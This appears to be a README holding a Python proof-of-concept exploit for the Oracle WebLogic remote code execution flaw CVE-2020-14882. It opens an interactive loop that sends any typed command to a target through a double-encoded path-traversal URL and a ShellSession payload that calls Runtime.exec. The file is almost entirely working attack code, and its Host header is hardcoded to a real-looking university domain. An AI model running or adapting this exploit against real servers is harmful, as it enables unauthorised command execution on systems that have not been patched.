README.md
Rendering markdown...
#!/usr/bin/python3
import requests
# -*- coding: utf-8 -*-
banner = """
▒█▀▀█ ▒█░░▒█ ▒█▀▀▀ ░░ █▀█ █▀▀█ █▀█ █▀▀█ ░░ ▄█░ ░█▀█░ ▄▀▀▄ ▄▀▀▄ █▀█
▒█░░░ ░▒█▒█░ ▒█▀▀▀ ▀▀ ░▄▀ █▄▀█ ░▄▀ █▄▀█ ▀▀ ░█░ █▄▄█▄ ▄▀▀▄ ▄▀▀▄ ░▄▀
▒█▄▄█ ░░▀▄▀░ ▒█▄▄▄ ░░ █▄▄ █▄▄█ █▄▄ █▄▄█ ░░ ▄█▄ ░░░█░ ▀▄▄▀ ▀▄▄▀ █▄▄
Research: Jang
C0de by Base4Sec - @s1kr10s
"""
print(banner)
# Post Review - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
host = input("Remote Host: ")
port = int(input("Remote Port: "))
path = "/console/images/%252E%252E%252Fconsole.portal"
url = "{}:{}{}".format(host, port, path)
while True:
cmd = input("$cmd> ")
payload = "_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('{}');\");".format(cmd)
headers = {
"User-Agent": "Mozilla",
"Host": "mosaic.mcmaster.ca",
"Accept-Encoding": "gzip, deflate",
"cmd": "tasklist",
"Content-Type": "application/x-www-form-urlencoded"
}
try:
print("Sent...")
response = requests.request("POST", url, data=payload, headers=headers)
except:
print("Fail server ({}).".format(host))
exit()